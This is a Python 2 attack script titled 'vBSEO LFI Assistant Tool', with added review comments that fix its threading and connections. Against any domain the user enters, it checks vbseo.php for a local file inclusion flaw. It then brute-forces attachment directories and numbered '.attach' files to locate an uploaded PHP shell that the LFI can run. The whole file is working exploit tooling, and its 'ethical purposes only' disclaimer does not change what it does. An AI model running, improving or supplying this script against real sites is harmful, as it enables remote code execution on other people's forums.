#!/usr/bin/python
# ______ __ __ __ __ ______
# /\__ _\ /\ \__ /\ \/\ \ /'__`\/\__ _\
# \/_/\ \/ ___\ \ ,_\ __ _ __\ \ `\\ \/\ \/\ \/_/\ \/
# \ \ \ /' _ `\ \ \/ /'__`\/\`'__\ \ , ` \ \ \ \ \ \ \ \
# \_\ \__/\ \/\ \ \ \_/\ __/\ \ \/ \ \ \`\ \ \ \_\ \ \ \ \
# /\_____\ \_\ \_\ \__\ \____\\ \_\ \ \_\ \_\ \____/ \ \_\
# \/_____/\/_/\/_/\/__/\/____/ \/_/ \/_/\/_/\/___/ \/_/
# --------------------------------------------------------
# Title: vBSEO LFI Assistant Tool
# Author: MaXe
# Site: http://www.intern0t.net
#
# Description: 1) Checks whether the vBSEO installation
# is patched or not. 2) Attempts to find
# the physical location of an uploaded
# attachment phile. (PHP Shell)
#
# Version: 2.2.3 - Multi-Threading! - Basic Version
#
# License: -- Attribution-ShareAlike 3.0 Unported --
# http://creativecommons.org/licenses/by-sa/3.0/
#
# Notes: Please note, that this tool does not work on
# all types of hosts and you should therefore
# modify this script to your own needs.
# Multi-Threading in this tool is very buggy!
#
# Disclaimer: This tool is meant for ethical purposes only.
# Import the appropriate libraries.
import os
import re
import httplib
import sys
import thread
import time
# Clear the screen in a sufficient way.
# Pick the platform's clear-screen command; anything that is neither
# POSIX nor Windows just gets a notice instead.
_clear_cmd = {"posix": "clear", "nt": "cls"}.get(os.name)
if _clear_cmd is None:
    print("[!] Cannot clear screen automatically.\n")
else:
    os.system(_clear_cmd)
print("File Finder by MaXe from InterN0T.net\n\n")
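# Get user-input and define global variables.
def _normalize_target(raw):
    """Reduce what the user typed to the bare host name httplib expects.

    Surrounding whitespace, a leading http:// or https:// and a trailing
    slash are dropped.  The scheme is only *removed*: every request in this
    script is plain HTTP on port 80, so an https-only host is not reached.
    Anything after the host (a path such as host/forum) is left as typed;
    HTTPConnection wants a host name only, so keep the input to that.

    raw: the string returned by raw_input().
    Returns the cleaned host name (may be empty if nothing usable was typed).
    """
    # Anchored on purpose: the original pattern was unanchored and would
    # also have stripped a scheme appearing in the middle of the string.
    host = re.sub(r"^(http://|https://)", "", raw.strip())
    return host.rstrip("/")


target = raw_input("Enter a domain to scan: ")
file_match = raw_input("Enter a keyword to look for: ")
# Candidate attachment directories probed first; hits are collected in
# poss_main_dir, numbered sub-directories beneath those in sub_dir.  Both
# lists are filled in place by worker threads.
main_dir = ["attach", "attachment", "attachments", "download"]
poss_main_dir = []
sub_dir = []
# Strip away http and https from the target variable.
newtarget = _normalize_target(target)
if not newtarget:
    print("[!] No target given, quitting.")
    sys.exit(1)
if not file_match:
    # An empty keyword is contained in every response body, so the last
    # stage would report the first 200 it sees as a match.
    print("[!] No keyword given, quitting.")
    sys.exit(1)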
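# Perform a simple LFI probe to check whether the target looks vulnerable.
# A 200 alone proves nothing; the body must also carry text from the
# file the probe asked vbseo.php to include.
print("[*] Checking if site appears to be vulnerable.")
conn = httplib.HTTPConnection(newtarget, 80)
try:
    conn.request("GET", "/vbseo.php?vbseoembedd=1&vbseourl=./clientscript/ieprompt.html")
    resp = conn.getresponse()
    status = resp.status
    # Only read the body when it will actually be inspected.
    body = resp.read() if status == 200 else ""
finally:
    # The original never closed this connection.
    conn.close()
if status == 200:
    print("[+] Site is responding, this is good.")
    # NOTE(review): only the text "Enter text..." of the original marker
    # pattern survived in this copy of the file (the literal was split
    # across two lines); confirm the marker against clientscript/ieprompt.html.
    if re.search(r"Enter text...", body):
        print(">> The site appears to be vulnerable!")
    else:
        print("[!] The site appears to be patched. (unknown error)")
elif status == 404:
    print("[!] The site appears to be patched. (404)")
else:
    # The original stayed silent on anything but 200/404 (e.g. 301, 403, 500).
    print("[!] Unexpected response %s; cannot tell whether the site is patched." % status)
# The directory/file search below runs regardless of this verdict; the two
# features of the tool are independent (see the header description).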
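# Thread target: probe one candidate attachment directory.
def findMainDir(target, array):
    """Send HEAD /array/ and record array in poss_main_dir on a 403.

    A 403 is taken as "directory exists but listing is forbidden"; every
    other status is treated as "not there" and ignored, so servers that
    answer 200 or 404 for existing directories are not detected.

    target: host name without scheme, reached over plain HTTP on port 80.
    array:  one candidate directory name taken from main_dir.
    """
    conn = httplib.HTTPConnection(target, 80)
    print("[*] Trying: http://%s/%s/" % (target, array))
    try:
        conn.request("HEAD", "/%s/" % array)
        status = conn.getresponse().status
    finally:
        # Always release the socket, not only on the success path.
        conn.close()
    if status == 403:
        print("[+] Directory found: /%s/" % array)
        # list.append is atomic under the GIL.  The original did
        # "if empty: rebind else +=", so two threads that both saw an empty
        # list could overwrite each other's hit.
        poss_main_dir.append(array)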
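# Thread target: probe the numbered sub-directories of one found directory.
def findSubDir(target, array):
    """Send HEAD /array/0/ .. /array/9/ and record each 403 in sub_dir.

    As in findMainDir, 403 is the only status treated as a hit.  Entries
    are stored as "array/i" so the next stage can use them as a path.

    target: host name without scheme, reached over plain HTTP on port 80.
    array:  a directory name previously found by findMainDir.
    """
    print("[*] Trying subdirs within: http://%s/%s/" % (target, array))
    for i in range(10):
        conn = httplib.HTTPConnection(target, 80)
        try:
            conn.request("HEAD", "/%s/%s/" % (array, i))
            status = conn.getresponse().status
        finally:
            # One connection per probe; the original closed only the last
            # one after the loop and leaked the other nine.
            conn.close()
        if status == 403:
            print("[+] Sub Directory found: /%s/%s/" % (array, i))
            # append() instead of the rebind/+= pair: atomic, and no race
            # between threads that both see an empty list.
            sub_dir.append("%s/%s" % (array, i))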
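# Thread target: look for our uploaded attachment inside one sub-directory.
def findPhile(target, array):
    """Probe /array/99.attach down to /array/0.attach and stop on a hit.

    Every path that answers 200 to HEAD is fetched with GET and its body
    searched for the keyword the user typed (module global file_match).
    On the first body containing it the URL is printed and the main thread
    is interrupted so the whole script stops.

    target: host name without scheme, reached over plain HTTP on port 80.
    array:  "dir/sub" path recorded by findSubDir.
    """
    print("[*] Trying to find our file within: /%s/" % array)
    for i in range(99, -1, -1):
        path = "/%s/%s.attach" % (array, i)
        conn = httplib.HTTPConnection(target, 80)
        try:
            conn.request("HEAD", path)
            status = conn.getresponse().status
        finally:
            conn.close()
        if status != 200:
            continue
        print("[+] File found, does it match our keyword? >> %s" % file_match)
        conn = httplib.HTTPConnection(target, 80)
        try:
            conn.request("GET", path)
            body = conn.getresponse().read()
        finally:
            # The original opened this second connection over the first
            # without closing either.
            conn.close()
        # Plain substring test.  The original handed the keyword to
        # re.search() unescaped, so a "." or "(" in it changed (or broke)
        # the match.
        if file_match in body:
            print(">> File %s.attach contains our keyword!" % i)
            print("Part URL: %s" % path)
            print("Full URL: http://%s%s \n" % (target, path))
            # sys.exit() inside a thread started by thread.start_new_thread
            # only ends that thread (SystemExit is swallowed silently), so
            # the original never actually stopped the scan.  Raise
            # KeyboardInterrupt in the main thread instead; the driver
            # already handles it by printing "Quitting..".
            thread.interrupt_main()
            return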
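# Driver: run the three stages, each as one thread per work item, and
# wait for a stage to finish before reading the list it fills.
def _run_and_signal(fn, item, done):
    """Thread entry: run fn(newtarget, item), then release `done`.

    The thread module has no join, so a pre-acquired lock released in a
    finally block is how the main thread learns the worker is finished --
    including when the worker raises or calls sys.exit().
    """
    try:
        fn(newtarget, item)
    finally:
        done.release()


def _run_stage(fn, items):
    """Start fn on its own thread for every item and block until all are done.

    Threads are started one second apart, as the original did.  The wait
    polls with a short sleep instead of a blocking acquire() so that Ctrl-C
    (or thread.interrupt_main() from a worker) is delivered promptly;
    KeyboardInterrupt propagates to the caller.  Exits with status 1 if a
    thread cannot be created.
    """
    pending = []
    for item in items:
        done = thread.allocate_lock()
        done.acquire()
        try:
            thread.start_new_thread(_run_and_signal, (fn, item, done))
        except thread.error:
            print("[!] Could not create any threads. Quitting..")
            sys.exit(1)
        pending.append(done)
        time.sleep(1)
    while pending:
        if pending[0].acquire(False):
            pending.pop(0)
        else:
            time.sleep(0.5)


try:
    # The original only slept one second per spawned thread and then read
    # poss_main_dir / sub_dir while workers could still be appending.
    _run_stage(findMainDir, main_dir)
    # Check if any values were assigned to the poss_main_dir array. If not, quit.
    if not poss_main_dir:
        print("[!] No directories were found, quitting.")
        sys.exit()
    _run_stage(findSubDir, poss_main_dir)
    if not sub_dir:
        print("[!] No sub directories were found, quitting.")
        sys.exit()
    print("Waiting for threads..")
    # Replaces the fixed 60-second sleep; returns when every findPhile
    # worker has finished or is cut short by a KeyboardInterrupt.
    _run_stage(findPhile, sub_dir)
except KeyboardInterrupt:
    print("Quitting..")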
# Don't forget, that this script can be used for more than one thing.